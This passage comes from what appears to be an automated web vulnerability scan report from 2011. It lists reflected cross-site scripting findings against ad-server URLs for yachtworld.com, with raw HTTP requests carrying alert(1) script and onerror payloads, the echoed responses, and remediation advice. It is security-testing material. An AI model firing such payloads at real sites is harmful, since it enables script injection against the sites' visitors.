Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1645
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...
39.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1612392991/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c?_RM_EMPTY_&db86e"><script>alert(1)</script>5183e94c501=1" WIDTH=2 HEIGHT=2>

1.62. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2a9"%3bd94ad94d9d1 was submitted in the REST URL parameter 4. This input was echoed as 7f2a9";d94ad94d9d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com7f2a9"%3bd94ad94d9d1/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkpU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2280
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
r_d.getHours()+":"+pr_d.getMinutes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com7f2a9";d94ad94d9d1/en/opensearchresults.html/L44/564822575/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$";
var pr_nua=navigator.userAge
...[SNIP]...

1.63. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d78c"><script>alert(1)</script>fe7c8e98f85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com9d78c"><script>alert(1)</script>fe7c8e98f85/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkpU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2332
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com9d78c"><script>alert(1)</script>fe7c8e98f85/en/opensearchresults.html/L44/2042619781/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.64. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c8e"%3bfd582fa1b0 was submitted in the REST URL parameter 5. This input was echoed as e0c8e";fd582fa1b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/ene0c8e"%3bfd582fa1b0/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkpU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2280
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
.getHours()+":"+pr_d.getMinutes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/ene0c8e";fd582fa1b0/opensearchresults.html/L44/1774599932/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$";
var pr_nua=navigator.userAgent
...[SNIP]...

1.65. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b5f"><script>alert(1)</script>40e79c93d61 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en70b5f"><script>alert(1)</script>40e79c93d61/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkpU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2332
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en70b5f"><script>alert(1)</script>40e79c93d61/opensearchresults.html/L44/1747733180/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.66. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0118"-alert(1)-"177271b20ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.htmlf0118"-alert(1)-"177271b20ec/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkqU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
tMinutes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.htmlf0118"-alert(1)-"177271b20ec/L44/790518879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$";
var pr_nua=navigator.userAgent.toLowerCase();
var prH
...[SNIP]...

1.67. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fc8f"><script>alert(1)</script>1e059ba3714 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html7fc8f"><script>alert(1)</script>1e059ba3714/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkqU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html7fc8f"><script>alert(1)</script>1e059ba3714/L44/384998849/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.68. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77dd"><script>alert(1)</script>9f7ca291be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44c77dd"><script>alert(1)</script>9f7ca291be/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkqU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2332
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44c77dd"><script>alert(1)</script>9f7ca291be/L/429850550/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.69. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70ef0"-alert(1)-"e3e5235e2eb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L4470ef0"-alert(1)-"e3e5235e2eb/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkqU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2304
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
utes()+"|"+-pr_d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L4470ef0"-alert(1)-"e3e5235e2eb/L/238953120/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$";
var pr_nua=navigator.userAgent.toLowerCase();
var prHos
...[SNIP]...

1.70. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c04e"-alert(1)-"1a646b58092 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top19c04e"-alert(1)-"1a646b58092/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkrU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
d.getTimezoneOffset()/60;
var pr_postal="";
var pr_data="";
var pr_redir="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/981469312/Top19c04e"-alert(1)-"1a646b58092/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c?$CTURL$";
var pr_nua=navigator.userAgent.toLowerCase();
var prHost=(("https:"==doc
...[SNIP]...

1.71. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 929ec"><img%20src%3da%20onerror%3dalert(1)>37c23b40443 was submitted in the REST URL parameter 9. This input was echoed as 929ec"><img src=a onerror=alert(1)>37c23b40443 in the application's response.

